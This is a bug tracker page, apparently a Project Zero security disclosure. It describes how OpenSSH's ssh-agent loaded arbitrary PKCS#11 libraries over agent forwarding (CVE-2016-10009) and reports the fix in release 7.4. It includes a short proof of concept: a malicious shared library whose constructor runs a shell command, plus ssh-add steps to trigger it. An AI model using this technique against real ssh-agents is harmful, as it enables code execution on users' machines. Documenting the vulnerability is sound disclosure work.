New issue
Advanced search Search tips

Issue 1009 link

Starred by 1 user

Issue metadata

Status: Fixed
Closed: Dec 2016

Sign in to add a comment

OpenSSH: agent protocol permits loading arbitrary libraries

Project Member Reported by, Nov 24 2016

Issue description

The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded.

This means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine.

To reproduce the issue, first create a library that executes some command when it is loaded:

$ cat evil_lib.c
#include <stdlib.h>
__attribute__((constructor)) static void run(void) {
  // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH,
  // prevent recursion through system()
  system("id > /tmp/test");
$ gcc -shared -o evil_lib.c -fPIC -Wall

Connect to another machine using "ssh -A". Then, on the remote machine:

$ ssh-add -s [...]/
Enter passphrase for PKCS#11: [just press enter here]
Could not add card: [...]/

At this point, the command "id > /tmp/test" has been executed on the machine running the ssh agent:

$ cat /tmp/test
uid=1000(user) gid=1000(user) groups=[...]

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Project Member

Comment 2 by, Dec 19 2016

Fixed in release 7.4 (

 * ssh-agent(1): Will now refuse to load PKCS#11 modules from paths
   outside a trusted whitelist (run-time configurable). Requests to
   load modules could be passed via agent forwarding and an attacker
   could attempt to load a hostile PKCS#11 module across the forwarded
   agent channel: PKCS#11 modules are shared libraries, so this would
   result in code execution on the system running the ssh-agent if the
   attacker has control of the forwarded agent-socket (on the host
   running the sshd server) and the ability to write to the filesystem
   of the host running ssh-agent (usually the host running the ssh
   client). Reported by Jann Horn of Project Zero.
Project Member

Comment 3 by, Dec 19 2016

Labels: CVE-2016-10009
Project Member

Comment 4 by, Dec 23 2016

Labels: -Restrict-View-Commit

Comment 5 Deleted

Sign in to add a comment